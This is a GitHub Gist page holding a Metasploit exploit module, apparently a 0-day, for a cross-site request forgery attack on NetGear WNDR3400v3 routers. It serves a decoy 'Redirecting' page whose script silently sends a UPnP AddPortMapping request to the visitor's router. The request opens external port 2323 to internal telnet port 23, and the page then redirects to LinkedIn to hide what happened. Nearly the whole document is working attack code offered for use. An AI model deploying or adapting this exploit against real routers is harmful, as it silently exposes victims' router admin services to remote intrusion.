-
-
Save carnal0wnage/877e17f5f35a123ac9b7 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = ExcellentRanking | |
include Msf::Exploit::Remote::HttpServer::HTML | |
def initialize(info = {}) | |
super(update_info(info, | |
'Name' => 'NetGear UPnP CSRF', | |
'Description' => %q{ | |
This module triggers a UPnP mapping via CSRF on the NetGear WNDR3400v3 and other NetGear routers. | |
}, | |
'Author' => [ 'phikshun' ], | |
'License' => MSF_LICENSE, | |
'Version' => '$Revision: 14774 $', | |
'References' => | |
[ | |
[ 'NA', 'NA' ], | |
], | |
'Platform' => 'linux', | |
'Privileged' => false, | |
'DefaultOptions' => | |
{ | |
'DisablePayloadHandler' => 'true', | |
}, | |
'Targets' => | |
[ | |
[ 'Netgear WNDR3400v3', { }, ], | |
], | |
'DefaultTarget' => 0, | |
'DisclosureDate' => '0 day, yo')) | |
register_options( | |
[ | |
OptPort.new('EXTPORT', [ true, "The external port to map", 2323 ]), | |
OptPort.new('INTPORT', [ true, "The internal port to map", 23 ]), | |
OptString.new('INTIP', [ true, "The internal IP to map to", '192.168.1.1' ]) | |
], self.class) | |
end | |
def generate_html | |
html = <<-EOS | |
<html> | |
<head> | |
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.js"></script> | |
<script> | |
$(document).ready(function() { | |
var postdata = '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription>#{Rex::Text.rand_text_alpha(8)}</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration><NewInternalClient>#{datastore['INTIP']}</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>#{datastore['EXTPORT']}</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>#{datastore['INTPORT']}</NewInternalPort></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>' | |
$.ajax({ | |
url: 'http://#{datastore['INTIP']}:5000/Public_UPNP_C3', | |
type: 'POST', | |
data: postdata, | |
dataType: 'xml', | |
contentType: 'text/plain', | |
complete: function() { | |
window.location = "http://www.linkedin.com"; | |
}, | |
}); | |
}); | |
</script> | |
</head> | |
<body> | |
<h1>Redirecting... Please Wait</h1> | |
</body> | |
</html> | |
EOS | |
end | |
def on_request_uri(cli, request) | |
print_status("Sending CSRF") | |
send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } ) | |
end | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment